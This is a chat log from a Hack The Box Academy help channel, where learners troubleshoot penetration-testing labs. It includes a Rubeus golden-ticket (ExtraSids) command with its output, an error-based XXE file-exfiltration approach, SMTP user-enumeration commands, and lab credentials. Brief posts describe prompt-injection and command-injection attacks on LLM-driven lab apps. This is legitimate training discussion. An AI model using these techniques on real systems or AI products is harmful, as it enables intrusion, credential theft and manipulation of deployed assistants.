#modules
maybe search HTB forums or try to check old messages on this section, you will likely find an answer
Holy shi, assessment on PassAttacks was awesome
The module wasn't that consistent for me, but the assessment - masterpiece, it was fun. Thanks for all the help!
Run the install script line by line; its annoying but it breaks running it as a script
@fathom pendant Thank you, I just found the creds (even tho I knew it was like in the example lol), I will be running line by line
thanks again
Module is above tier 0 so im deleting your other message
Is there a htb live support ?
I'm sry I didn't see the rule
Are we able to ask questions here about specific aspects of labs in the HTB Academy?
Need some help? Learn how to reach the support team on Academy.
as long as it doesn't actually spoil any information for modules above tier 0; consider any information you had to dig for/find/enumerate as a spoiler
Yeah that's why I wanted to ask first. It's a question on a specific command in the CPTS Password Attack module. So I wanted to ensure I didn't spoil something or make HTB upset because it references what is in the "solution" button
i'm curious what you mean shoot me a dm and i'll see if I can clarify something; the solutions (at least in my opinion) don't really do any bit of explanation as to why it works (that's left to the reading, most of the time)
Ok, I will message you
Hi, Samuel, I am doing this section
Hi Everyone, I am trying to do RDP and SOCKS Tunneling with SocksOverRDP, but I have a problem with this section, I execute the dll and it was successful, but when I try to connect by RDP to the machine 1, I have the message "Remote Desktop can't connect to the remote computer"
I am in the pivot windows
kali - 10.10.14.205
pivot windows - 10.129.X.X (I did all and was ok, but I can't connect to machine 1 by RDP)
machine 1 - 172.16.5.19 victor:pass@123
machine 2 - 172.16.6.155 jason:WellConnected123!
how can I connect to 172.16.5.19 from windows pivot 10.129.X.X?
The reading indicates a machine in the middle
Hello, I have a question regarding understanding Log Sources & Investigating with Splunk. The question asks: "find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests." While I got the answer I am unsure regarding the difference between event ID 4768 and 4769 and why they both give vastly diff answers.
4768 is TGT request and 4769 is TGS request.
Essentially:
4768 - First Kerberos Authentication request.
4769 - Subsequent Kerberos Authentication requests to other services. (which in this case the logged account name also shows the services they'd be accessing)
The users can use the same TGT to get multiple TGSs depending on how long the TGT is valid for which creates the difference in counts.
Can anyone help me with the Prompt Injection Attacks Skills Assessment ? I have successfully removed the CEO, not been flagged as malicious using the admin panel and made the LLM output a summary with no flag.
SocksoverRDP - can someone help me with this?
I am doing SQLMAP ESSENTIALS - attacking tuning for the first question I got the flag but it's not right the hint says to run it multiple times and I did but it still gives the same incorrect format at the end `A7}
known thing, please don't share commands, as that's also part of figuring out the environment
Hi! Stuck on LLM Output Attacks Skills Assessment (LLMPics).
Got admin_key via SQLi on Imagebot, accessed Adminbot.
Tried command injection on calculate_shipment_time - get "Invalid JSON response" but can't see output.
Hint says "Pay attention to function names and admin username" - what am I missing?
Module Name: Active Directory Enumeration & Attacks > Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Im unable to Perform ExtraSids Attack even though i match the requirements and got klist same
.\Rubeus.exe golden /rc4:9d765b482771______97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
...
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'hacker@LOGISTICS.INLANEFREIGHT.LOCAL'
...
[*] base64(ticket.kirbi):
doIF0zC....C5MT0NBTA==
[+] Ticket successfully imported!
PS C:\Tools> klist
Current LogonId is 0:0xc67b4
Cached Tickets: (1)
#0> Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 1/29/2026 22:08:31 (local)
End Time: 1/30/2026 8:08:31 (local)
Renew Time: 2/5/2026 22:08:31 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
But when i ls to try to access it shows:
ls \\academy-ea-dc01.inlanefreight.local\c$
ls : Access is denied
At line:1 char:1
- ls \academy-ea-dc01.inlanefreight.local\c$
-
+ CategoryInfo : PermissionDenied: (\\academy-ea-dc01.inlanefreight.local\c$:String) [Get-ChildItem], UnauthorizedAccessException + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
ls : Cannot find path '\academy-ea-dc01.inlanefreight.local\c$' because it does not exist.
At line:1 char:1
- ls \academy-ea-dc01.inlanefreight.local\c$
you can dm me if you want but maybe your instance went bust, try restarting it
need a lil help with skills assessment on pivoting tunneling
struggled a lot with rdp throughout the module,,,proxychains and rdp do not seem to go hand in hand
make sure you disabled real-time protection in windows security
yeah i did that to resolve the issue
can u pls help me with skills assessment
i cant rdp
unfortunately, i skipped skills assessment for now, i would help if i knew it
Hello everyone
Could someone help me this question? I'm learning about basic knowledge then, The website instructs about ParrotOS Security System but It doesn't have HTB - your own personalized Pwnbox option. so how can I get this.
Anyone who did the introduction to windows evasion module ?
Windows Lateral Movement, Skill Assessment, Q5 "What is the password for VNC?"
I am trying to craft a payload on ||WSUS||, but I get error: "Function error - FbGetComputerTarget. Error Message: The EXECUTE permission was denied on the object 'fnGetComputerTargetID', database 'SUSDB', schema 'dbo'."
any hint? thank you
EDIT: it looks like this is not a "blocking" error message... I was able to push the update anyway
I am never able to rdp with proxychains when using dynamic port forwarding..any idea why?
Someone suggested to use pwnbox for this skills assessment but still tryna find root cause
Please refrain from posting content from modules above Tier 0. A spoiler tag does nothing.
You should be fine using the provided payload from the case study and as long as you compiling it as per the instructions it should work for you. Can also test them out before shutting down the DEV host if you are using it.
That's the thing it worked fine on the dev but it won't work in the victim machine. And btw how do you get the IP of the dev machine I always go back to section 1 and start the machine to get its IP and it's very tedious and for delivery I spawn a python http server
I likely just had one tab open with the section that provided the DEV host and another that I used to progress through the module.
You can DM what you are trying and I can compare it to what I got to work, but it was legit straight from the module.
Alright I will retry the one it and let you know
Trilocor
Heyyy, In SQLMap Case#5 under Attack Tuning i got the flag but it is saying incorrect, can anyone please recheck it for me in DMs ?
Rerun it, as sometimes when the flag is being printed, a character or 2 might get missed or skewed.
i tried but i am getting the same thing
You can DM what you have.
I've reported it. It looks like it was updated and then removed.
hi
Everything you posted in this channel, aside from the question about downloading the content of the modules was not necessary or related to any HTB academy modules or sections.
where is the answer
Do you see a feature that allows you to download the content of the modules? Should be able to answer this yourself.
no i don't
Quit spamming this channel. You can ask support if you need more information than what I have provided.
are you from support?
It will be released again with 7.1
No I am a community contributor.
Peace guys, I'm currently stuck on module "JavaScript Obfuscation" I'm on the 2nd flag and it's not accepting my answer. I've put HTB {} and nothing. Any tips?
same problem how did u solve it ?
Hello, i might need some help with the Unrestricted resource Consumption part of the API attacks module. Not sure how much i can share to avoid spoiling the module, but my approach has been similar to the broken authentication section, trying to fuzz the OTP.
It will likely come with parrot 7.1
It was actually available in https://deb.parrot.sh/parrot/iso/7.1/ for a few moments, but was removed since it had some issues
It tried again and it worked this time and I didn't change the code just recompiled it lol. Previously in the log it would show that it is running but I won't get checking for calculator now it got it in the log and got a shell that's some really weird behavior xD
a quick doubt inorder to access the linux machine the modules in ad section mention us to rdp into Ms01 then ssh into 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt! .. this seems not to be working .. any idea?
in Active Directory Enumeration & Attacks module
i dont know if this is the right place to ask but my module 'html POST' is not resolving cloudflare and seems to break and show errors in dev tools. pinging cloudflare has 0 packet loss within vm. has this been an issue before?
Which section?
Its coming again in 7.1, its security edition with some fancy looks
Hi all, I am stuck at the thick client assignment in cwes. When I start xbug64 and want to select an address it keeps moving. I tried to pause all threads, paused all selected data without any result
I also cannot find a way to filter on MAP and RW
Tried perplexity and chatgpt to help. No luck. Can someone point me in the right direction? Thanks already
Hey I'm on the Kerberos Attack - Skill assessment part can i dm someone to get help ?
You should run that command as administrator
I am currently doing the PMKID Attack section of the Attacking WPA/WPA2 Wi-Fi Networks module, I successfully cracked the hash with hashcat but when I provide it as the flag it does not get accepted.
Try manually typing, make sure no whitespace etc
Lol now after refreshing the page suddenly the question is marked as complete
Hi everyone, hope you're doing well.
I'm working on a lab involving Tiny File Manager, and according to the module, the expected vulnerability is Command Injection, so that's what I've been focusing on.
What I've done so far:
Identified that the Advanced Search feature sends an AJAX POST request.
Intercepted the request with Burp and confirmed parameters such as content, path, type=search, and ajax=true.
Tried multiple inputs and variations while observing response behavior, timing, and errors, but I haven't seen any clear indication of command execution yet.
Reset the instance to rule out caching or a broken environment.
At this point, I'm struggling to understand where command execution might occur in this feature, or what kind of behavior I should be looking for to confirm a successful injection.
If anyone could provide a conceptual hint or point me in the right direction (without spoilers), I'd really appreciate it.
Thanks in advance for your help.
Hey everyone. A little stuck on the Linux Forensics course. Anyone have an idea about this q? "What is a session uuid(-U) for a meterpreter agent? Provide answer as base64 encoded value."
hey yall, I've launched an instance and was trying to log in via SSH but it keeps timing out. I have tried resetting the target twice but that doesn't change anything, has anyone run into this and have a fix?
Not to be annoying if this is too basic but are you connecting from the Pwnbox or connected to the VPN?
not annoying at all, only been at this a few weeks! Im using the Pwnbox.
I also tried resetting the instance, and that doesn't seem to have fixed anything.
Interesting. What happens if you ping it and what is its IP/your ssh command?
Its just sitting, I assume it will come back timed out.
my PC was updated last night so I'm trying to see if any settings were updated.
If you are on the pwnbox your computer shouldnt matter as the pwnbox should be running on a network that has access to it. you could restart both the target and pwnbox. Otherwise you could see if the pwnbox has a route to that server by typing "route". From there you could ping the gateway for that ip range to see if maybe the gateway is down..... actually as I say all of this... It may be easier to try to switch to a different location for the pwnbox (maybe something funky is going on). Also make sure you arent supposed to ssh into a non-standard port maybe?
i have tried resetting the target and pwnbox a few times now with no luck, and if i terminate it ill have to wait for tomorrow (because im poor, lol), so changing locations would have to wait as well.
I pinged the gateway and it seems to be going through just fine.
in terms of "ssh into a non-standard port" I dont see any instructions along that line.
today is probably a wash. it going to time out in 30 minutes. If it doesn't work tomorrow I may try setting up for the VPN method.
if it says to connect using a non standard port then sometimes there are no instructions and its good to learn each of the flags you can with the tools that you are to use. if it says to use another port then this could be why its not working because your command is for the default port since its not specified in your command. for example. your command should be:
ssh -p <portnumber> htb-student@10.129.16.151
the default port is 22
Did anyone ever find an answer to this? I'm having the exact same problem
Unfortunately I do not remember lol that was a long time ago
hello there,
in the Web Attacks module, under XXE - Advanced File Disclosure, I'm trying to understand a specific behavior.
why are we able to retrieve files like the /flag.php or /etc/hosts, but not /etc/passwd, whether using file://, php://filter/..., or even a combination of error-based XXE + CDATA (file:// one)?
the only method I've found that successfully exfiltrates /etc/passwd via error-based XXE is the following multi-step approach:
- first, trigger an error-based XXE using a reference to a non-existent file
- then, redirect the entity to a joiner (commonly named joined)
- wrap the output using a CDATA payload
- inside the CDATA file, use php://filter for encoding
is there like a specific parsing or encoding constraint that explains why the simpler approaches fail for /etc/passwd but work for other files?
I used ligolo
thats how the module is structured. you use ligolo to setup the tunnel inside the internal network, and ntlmrelayx setups a socks server
Right, I thought you were using proxychains. Maybe I misread your issue.
no, i was. thats part of the attack chain
Try some of the first things covered in that section.
ligolo gives access to ntlmrelayx, ntlmrelayx's attack sets up a socks proxy, so you use proxychains4 as to connect via mssqlclient
Ah, yeah looking at my notes now.
So you are having issues with it connecting after performing ntlmrelaying?
yea
You can DM what you are trying.
ntlmrelay worked. then the next step is to connect via mssqlclient
any1? 
lol i've tried everything
Shoot me a DM with what you have tried. Probably minor.
/etc/passwd often contains characters like : and / so, they may cause some things to break
Hey all: working on the attacking common applications -> Exploiting Web Vulnerabilities in Thick-Client Applications I've modded the server on the fatty-client and logged in. I'm at the point where I have to modify the code again in a "test.java" file. It has a bunch of these comments at the front of the line, and it's been a while since I've written java code. Will those comments at the front of the line cause problems?
There's no reason for them to cause any problems especially as Java is a compiled language.
I have question for any course from silver annual subscription. does the completed course will be forever accessible to me once completed them like it was buying with cubes? or it access will expire once the annual subscription ends? thank you.
Every module you complete during your subscription is unlocked for you to keep forever. So not the whole course, but the individual subscriptions. If you complete all the modules then you'll have them all.
Does it included access to exercises and assessment too? I can keep accessing them to practice, recall the lesson even after the subs expires?
the entire module is unlocked forever, everything included
just complete the module 100%
That's wonderful.
Hey everyone. A little stuck on the Linux Forensics course. Anyone have an idea about this q? "What is a session uuid(-U) for a meterpreter agent? Provide answer as base64 encoded value."
the comments are just line numbers, but no they won't cause issues
I have some confusion in the reporting following the method for using sysreptor's reporting suggestion. which one should be filled out?
once again trying the skills assessment on pivoting module and I cant manage to rdp with proxychains ...am using ssh dynamic port forwarding
can anyone pls help me out
what part are you? would you like to consider other pivoting method aside ssh? I'm looking on my notes and don't remember the need to use rdp here. You may want to reconsider. However, this kind of lab might be having a tons of problem using proxychains you might want to debug what kind of error you are receiving. like do you have proper ports being forwarded pivot to pivot? is rdp allowed?
fourth ques
we gotta pivot to the discovered host, 172.16.5.35, and submit the contents of C:\Flag.txt
port 3389 is open on this internal host
[proxychains] Strict chain ... 127.0.0.1:9050 ... kerberos.mit.edu:88 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... kerberos-1.mit.edu:88
xfreerdp is trying to contact external Kerberos servers (MIT's public Kerberos servers) through SOCKS proxy, which is timing out.
if its me, I will try another pivoting method
I will try meterpreter port fwd
Check the module again. You have to fill everything in.
bruh I finished everything for the SQLMAP BESIDE Flag 5 last time it didn't give any answer now it's just not there at all lmao
nvm I had to restart and try a couple of times
jezz
Hello everyone, where can I ask questions to get help with unsolved problems in the Academy modules?
You can ask here. If someone can help you, they will get in touch with you.
Thank you. Since this is my first question, please let me know right away if there are any precautions I should be aware of.
Ask your question in this way.
I am on module X, section Y. I am stuck on question Z. I have tried various things that were discussed in the module, but I am stuck. Who can help me?
```
If we disable port scan (-sn), Nmap automatically ping scan with ICMP Echo Requests (-PE). Once such a request is sent, we usually expect an ICMP reply if the pinging host is alive. The more interesting fact is that our previous scans did not do that because before Nmap could send an ICMP echo request, it would send an ARP ping resulting in an ARP reply. We can confirm this with the "--packet-trace" option. To ensure that ICMP echo requests are sent, we also define the option (-PE) for this.
```
if -sn is enabled nmap sends ICMP Echo Request automatically but before that an ARP ping is sent
I don't understand `we ensure part` here
why put -PE again since it automatically sends ICMP Echo by default?
https://academy.hackthebox.com/module/19/section/101
https://giphy.com/gifs/spongebob-slow-patrick-bottle-2ohfKrgoRPYbRMVQfB
that's me, tell me if I am missing anything
.
Hi everyone, Is there an issue with the Active Directory Enumeration & Attacks machine? I cannot ssh into it.
Can't rdp into the machines in this module "Windows Event Logs & Finding Evil" i'm using the pwnbox and i've also tried using the vpn but i still get the "Invalid Sigil error"
I'm also using the provided command to rdp into the session but it is still not working
try switching TCP variant of the VPN
Ty
How can we reduce the lag on academy, everyone? I feel very frustrated because of the lag (especially when remoting into machines via RDP).
just finished skills assessment for pivoting
I am trying to understand how we have 2 diff interfaces here when they would quite possibly have the same ip addresses on both ? both have subnet masks 255.255.0.0 so both gonna have 172.16.0-255.0-255 or 172.16.0.0/16 ip address
still need help? DM me
Is there any problems with HTB servers? doing some modules, but when i spawn a "instance" (Pwnbox) for the labb, i can reach it for the first 30 secs then its cuts all out.
Yes, same problem here. Impossible to use the AD LAB for more than 30sec.
Hi i need a hint for Credential Hunting in Network Shares
Ahh then i know its not only me atleast
Iirc snaffler did the trick for me
Try Changing vpn regions @charred mountain @olive depot
i am using the snaffler and i find a lot of passwords and no one works
Gimme a sec to pull it up and remind myself how I went through it.
ok thanks
I don't know for @olive depot , but for me the problem is inside the AD lab. The Pwnbox is OK.
After connecting to the target machine via SSH, the system crashes after executing a few commands.
The first Question; the hint is in the question domain think of how domain usernames are structured
The Second Question; similarly the hint is in the question asking you for Domain Administrator
Both will require some filtering to find
okay thanks i will try
The second requires the credentials you find from the first as an fyi
I will say the powershell method ends up being a lot faster; but it works just the same with nxc
What? They are different IP's and subnets.
Hey, Anyone knows how much the AD Penetration Tester path costs if I'm using the Gold monthly subscription?
Yes.
(Total path cost / monthly cube gain) * monthly price
just completed the nmap module
the IDS stuff was pretty fun and not as bad as I expected
Its the same network?
Alright I've been putting together my AD enumeration and attack methodology. Ripped it from a few youtubers and from my own notes. Am I missing something?
bro how
those were so hard for me
You can see from the output they are on different subnets of the network
all of the stuff they quiz you on is taught in the module so I just referred to notes
We generally dont allow sharing of random files
@lime cosmos AEN is above tier 0, I dont recall running into too many restrictions.
Windows Lateral Movement -----> Windows Server Update Services (WSUS)
i'm facing this issue even tho i have done multiple reset on the lab
weird ... anyone faced this issue before in the module or know a possible fix ?
another reset for sanity check and still same issue !!!!
Are you running it on the correct machine?
Hey Y'all. I am working on the "Shells and Payloads" module, "The Live Engagement" in htb Academy, on the Penetration tester path. After starting VMs and RDP into the target, which is a MATE desktop environment there is no web browser? I've tried this over my VPN connection w/kali and the Pwnbox. In the walkthrough Host-1 hint: it says to " if you look at status.inlanefreight.local or browse to the IP on port 8080" But there is no web browser, there is a TOR browser but the box is not internet connected. And I used RDP to the Foothold host. Any help would be appreciated...
that's not a public host, so you should be able to connect to it if you can resolve it. maybe try firefox-esr?
Cool. i was able to use firefox from the command line, thank you!
Ethernet adapter Ethernet0:
IP Address: 172.16.5.35
Subnet Mask: 255.255.0.0
Default Gateway: 172.16.5.1
Ethernet adapter Ethernet1 2:
IP Address: 172.16.6.35
Subnet Mask: 255.255.0.0
both are on the 172.16.0.0/16 network
Except its not a /16 network, its a /24. Ik it seems misleading, but they are separate networks
Umm how did u find out its a /16 network?
hey all. I'm having an issue in the WEP module, with the ARP Replay Attack section. I've followed all the steps, but when I run the aircrack on WEP-01.cap, it's running into a segmentation fault and doesn't find the key. It also only finds a handful of IVs, instead of in the example where it finds 97822 out of 95000 (which I have questions about, mathematically speaking).
I've restarted the terminal something like 7 times, and it has this issue every time
MSSQL, Exchange, SCCM skill assessment: I need a nudge on Q3 if anyone can help
subnet mask
255.255.0.0 is /16. Just as 255.255.255.0 is /24. or 255.0.0.0 is /8. as you can see, there is a partner. it can be confusing as to how a subnet mask works, but the short answer is you are allocating bits to the host and client. NetworkChuck does a good video on YT on it if you're interested.
Ik about subnet mask
Its just that in the photo it is 255.255.0.0 but marcielee is saying its a /24 network not /16
Looks like they're wrong, it is /16 but both interfaces are on the same network. That's possible
Active Directory Enumeration & Attacks module, Skills assessment part 1
after gaining administrative privileges on || MS01 || i can't seem to find answer for question 4
```
Find cleartext credentials for another domain user. Submit the username as your answer.
```
it feels like i tried everything but still could not get it, any nudge would be appreciated
nevermind, i got it i am not sure but i didn't see this method in this particular module, but anybody who is wondering the answer, revisit password attacks module
What module are you doing?
Attacking Common Applications
Did you look at the Notifications function and add a new notification for execution of scripts? if so what script are you running?
probs DM me dont wanna spoil
I am on Windows escalation skill assessment p1, trying to run exploit suggester but its not working for me:
```
python2.7 windows-exploit-suggester.py \
  --database 2026-01-31-mssb.xls \
  --systeminfo sysinfo
```
I just pasted the output of the systeminfo file to sysinfo.
This is the error I am getting:
```
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[-] unable to determine the windows versions from the input file specified. consider using --ostext option to force detection (example: --ostext 'windows 7 sp1 64-bit')
```
Is it just not recognizing the system version from the output?
Sort of; the way the module behaves is as if its a segmented /24, not a /16
So some other logic is taking place to segment it
Ohhh yeah I remember that module... it seemed to be a difference in the router/switch configuration and the host itself which clearly was manually set.
Its really dumb though
Yeah I wouldn't expect this stuff in real environments cos who wouldn't just use DHCP unless it's that type of server.
And definitely confusing to people that have a base knowledge of segmentation
Usually only dedicated devices arent on DHCP
Yeah I'm familiar, but as far as I can remember that wasn't a dedicated server.
Reminds me i need to set a static ip for my dad's printer
Also yeet it into it's own vlan
Yeah in the practice context, setting ips manually is far better to ensure reliability of internal communication.
That's a lot of work I dont wanna do, and end up breaking. Setting a static is enough for me. Beyond that is just asking to be IT 
only if you're using the IPs directly, usually though DNS is involved and that can work with DHCP to ensure network connectivity
Yeah, it works fine as is
works much better in msfconsole, have u tried doing it that way?
Hello, I think I need some help with information gathering - virtual hosts, is this the right place to ask questions? :)
New versions of the seclist repo no longer contain the web one in the top1million, you can however use `grep -h -e "^web" *.txt | sort -u > web.txt` on the wordlists in the repo to get it; so as to not spoil i wont say which one the answer lies in
If you want to know what those do you can man grep and look for the options I mentioned, similarly man sort
If that was your question, if not https://dontasktoask.com
so my problem is that everything seems to work but I am not getting any "found", i tried adding the target with the inlanefreight .htb /etc/hosts but it does not seem to change anything either
I've tried:
- ffuf vHost fuzzing with -fs 116
- matching status codes
- comparing response hashes against the baseline
All responses still appear identical, so I can't isolate the correct web* etc
How are you fuzzing for vhosts? Are you doing the -H "Host: FUZZ.inlanefreight.htb"? Secondary note; if the sizes are all the same, then that likely indicates what you need to filter out
Yep - I'm fuzzing using -H "Host: FUZZ.inlanefreight.htb".
I checked the default response first (size 116), and since all responses were the same initially, I filtered that size out with -fs 116 to isolate real vHosts.
Module -> Introduction to windows command line : Skill Assessment
SSH to 10.129.xxx.x (ACADEMY-ICL-SKILLS11) with user "user2" and password ""
I just press enter when prompted for password, yet it says permission denied. Am i doing something wrong? I feel maybe I have to switch to user2 by logging in to user1 first (password for user1 is not "")
password is the answer found in user1 question
Not really, but I will keep that in mind. Thanks
Is certi able to find the URL where CA hosts web enrollment page or is it only able to identify that whether DC has CA enabled or not
ok looking at the WEP ARP replay attack... I keep getting this segmentation fault after I run aircrack on the WEP-01.cap
hi i need a hint for the PtH question 6
Follow the section
Hi Guys, I am stuck at Sliver C2 Skills Assessment. I got the administrator access on SRV09 and got the dbuser creds for DC02 and able to login through mssqlclient.py, but when i try to upload the pivot exe file to DC02 it is giving me an error, file not found. I feel some AV is blocking the connections. Can you pls point me the direction to move forward?
I am doing nc but i can't get the shell
i followed the section
This is the reverse shell question?
yes
hi can someone help me with Pivoting, Tunneling, and Port Forwarding Skills Assessment the last question i cant access the share and im confused how to continue...
Using Julio's hash, perform a Pass the H ........
Skills assessments were goated!
You can send me a DM with what you are trying.
@gray yacht can i shoot you DM on what i saw in the skills assessment
stuck on 'The Live Engagement' for Shells section. i uploaded cmd.war from /usr/share/laudanum/jsp to the WAR file to deploy in /manager and i'm not sure what to do next.
Try to open your upload in a new browser tab.
Sure
thanks, this was my next thought however i get the http 404 error
What's a 404 error?
You can shoot me a DM, so we can chat a bit more freely
Check the privs/groups of your owned users.
no i still dont get a connection to the dc because of the two network interfaces in the solution is only mentioned to click on the share but i dont manage to get a connection my mind says i should use proxifier i dont know i actually have no clue
You can shoot me a DM.
Anyone experienced with all labs. Wi-Fi penetration tester patch slow or lag?
They can be a bit laggy, especially the RDP connections. You can also use the creds to SSH into the targets instead of using the RDP connection.
Wow big thank bro

How do you make your notes in HTB and how do you sort them? I am not sure if I should rewrite my notes more efficiently
Hi everyone, I'm currently busy with the Network Foundations module, and I'm getting stuck at a question in the Wireless Networks section.
Question 5 specifically, which is "What manages multiple cell towers in cellular networks? (Format: three words)". The answer is Base Station Controllers, but whenever I submit, it says that it's incorrect and I cannot complete the section.
Could someone help me please?
@tender parcel Please take care not to post content from modules above tier 0
Fixed the issue. Thanks guys
Let's say I have pivoted to an internal network via ligolo. I wanna execute a Metasploit exploit (which requires LHOST, LPORT, RHOST fields) on a target in the internal network. Is it possible to receive the Meterpreter session on my attacking machine? If yes, how? Which IP should I specify as LPORT and LHOST?
I have a video on this you can check out.
Can I have the link for it please ?
Should be in my description
Which video are you referring to ? Accessing local host ports ?
Oh the reverse shell most probably you mean
It would likely be reverse shells and file transfers
Good Video but this is not exactly what I meant
You can DM what you are having issues with.
Hi everyone, im doing the Password Attacks module, Credential Hunting In Network Traffic section and i keep getting issues opening up the associated pcap file (demo.pcapng). The wireshark error says "Dissector bug: Invalid leading...". Any suggestions for how to fix?
I think the capture file is corrupted
more like wireshark problem for me
what version of wireshark are you using?
i am running 4.4.6
found a medium article try these fixes if you can
thank you very much 
I needed to update Wireshark (updated to 4.6.3). Thanks everyone for the help
is it me or the academy's box are kind of slow ? I'm making sqlmap and the requests are giving timeout so I had to do the sqli manually
because the tool don't work with requests giving timeout over and over.
Also having this same issue. Can't find any replies to this, so does anyone know what I am missing as well? Found this talked about under CDSA. G2G
Don't work too far ahead, each flag has a place
I'm wondering if this is causing my issue I posted above. I'm going to try to ssh in and see if it'll work any better.
Nope, still getting a segmentation fault. I don't understand why I'm getting that.
Yes is better. But I still need RDP to get the flag.
SMTP Username Enumeration - Module 112 / Section 1072
Hey everyone, documenting everything I've done so far to avoid any missing context.
Target IP: 10.129.22.87
Service: SMTP (25)
Domain identified: YES
1. Wordlist access in HTB VM
Tried downloading the provided wordlist:
wget https://academy.hackthebox.com/storage/resources/footprinting-wordlist.txt
Result: 404 Not Found
Confirmed it doesn't exist locally:
locate footprinting-wordlist.txt
Verified available lists:
ls /opt/useful/seclists/Usernames
Used SecLists usernames since the provided wordlist isn't accessible in the VM.
2. smtp-user-enum (default timeout)
smtp-user-enum -M VRFY -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25
smtp-user-enum -M EXPN -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25
Result: 0 results
3. Increased timeout
smtp-user-enum -M VRFY -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25 -w 15
Result:
root exists
mysql exists
Neither is accepted by the Academy validator.
4. Large list without domain
smtp-user-enum -M VRFY -U Names/names.txt -t 10.129.22.87 -p 25 -w 15
~10k users
Very slow
No useful results initially
5. Domain specified (works)
smtp-user-enum -M VRFY -U Names/names.txt -t 10.129.22.87 -p 25 -D inlanefreight.htb -w 15
Result: Many valid users found, e.g.:
admin@inlanefreight.htb
accounting@inlanefreight.htb
adam@inlanefreight.htb
Confirms:
VRFY works
Domain is required
Increased timeout is necessary
6. Answer attempts (failed)
Tried:
admin, admin@inlanefreight.htb
accounting, accounting@inlanefreight.htb
First enumerated users
With/without domain
None accepted by validator.
Conclusion
Enumeration method is correct
SMTP behavior understood
Results are valid
Issue appears to be answer expectation or lab validation, not technique
Looking for confirmation on the expected username format or whether the lab/validator is out of sync. Any guidance appreciated.
The wordlist is in the "Resources" section. https://academy.hackthebox.com/storage/resources/Footprinting-wordlist.zip
yeah, the ssh works better, but I'm still having the same errors when I run aircrack. intensely frustrated by this not working
Sudo?
Yes, I run with sudo. I also tried going to root with sudo -s and that didn't do anything different
I learned a lot from this module; however, since I copied footprinting-wordlist.txt and saved it in a nano command file to run via script, I was unable to use the names on the list or locate the file on my local machine. As a result, I still couldn't obtain any approved answers. Could you clarify the exact output that is expected?
You'll need to run the scan with the lists provided in the module's resources section. If you don't you're not going to get the answer.
Okay. I have attempted to download it, but was unable to through the local machine. Am I at least on the right track copying the list and running automated scripts? Not sure which direction works, and this is day 6 lol.
The VM for the module.
are you using a vm or the pwnbox?
you can just paste the lists into nano or something on a vm or the pwnbox
then save it somewhere and use it
I am using pwnbox. Okay, I have tried that. Re-attempting now.
I am still not getting anywhere with the output: https://imgur.com/a/wX4KzFC
Nothing I type as the answer is ever accepted. No matter what I add or take away from the answers given. This is the question from the module. Maybe I am misinterpreting what is being asked: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
Man i just want to cry; I was doing the " Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php' " mission from Web requests POST part, and wondering why I kept getting empty results even if i was following everything correctly :/ and turned out it just didnt work for some reason on my own pc, but same command worked on the pwnbox.
hngh over an hour fighting for no reason when i thought I was typing something wrong
I wonder if it was checking the user agent and my curl was different version than pwnboxes?
Not likely, there are some targets in web modules that are only accessible on the HTB network however and you might have to be connected to the VPN to connect to them.
idk, it was weird, all the other exercises on the module worked well from my own system's terminal, and the site itself worked on my browser so, it just left me bit confused haha.
if i remember correctly you only get one answer. have you tried to run it with nmap instead? with nmap and RCPT i get a lot of hits and then you can use telnet to test
Hello guys ! at the Using Web Proxies , Burp Intruder i have found the admin/index.html but i cannot find the flag. is the flag on another html file?
Hi All! Can anyone guide me on HTTPS/TLS ATTACKS module, chapter POODLE & BEAST. I've tried following the examples, but I'm getting either `Connection refused` or `NOT_VULNERABLE`. Tried both vm and pwnbox. NVM, solved. That very moment when you realise you have misled yourself
Hi everyone,
I would appreciate some guidance to confirm whether I am approaching this lab correctly.
I authenticated as guest/guest and focused on the Advanced Search functionality, since this is the only feature that logically could involve system-level operations in a file manager.
I captured and analyzed the POST request used by Advanced Search and tested for command injection using multiple techniques (command separators, time-based payloads, and variations placed at the end of user input, as suggested in the hint).
However, none of the inputs resulted in execution behavior, time delays, error messages, or any output differences. The application consistently enforces input constraints (such as minimum character length) and behaves like an internal file search rather than a system command execution.
Based on this behavior, it appears that this functionality does not invoke OS commands and therefore is not vulnerable to command injection.
Could someone please confirm if the goal of this challenge is to identify the absence of command injection rather than exploit one, or point me in the right direction if I am missing another execution vector?
Thanks in advance for your time and help.
ok. So in the ongoing saga of the WEP ARP Request replay attack, I was able to get a new result after I let the airodump produce more results in the WEP-01.cap file. When I run aircrack -3 now, it runs the script without a segmentation fault. However, it's still failing to find the key... so I guess I'll try again and let the airodump go even longer?
You can send me a DM so I can see what you have going on.
Hello, I have a suggestion about something I saw in the Linux BufferOverflow Module:
It gives us the command to set the Intel syntax as default, which is nice, but nowadays is it not better to recommend using GEF instead?
Also the suggested command:
```sh
echo 'set disassembly-flavor intel' > ~/.gdbinit
```
Will overwrite your configuration file, deleting the lines `GEF` "installed" in case you had `GEF`.
`GEF` comes with Intel syntax already by default.
Wouldn't it be more useful to point to `GEF` directly, which is the enhanced version of `GDB` for modern days?
```sh
bash -c "$(curl -fsSL https://gef.blah.cat/sh)"
```
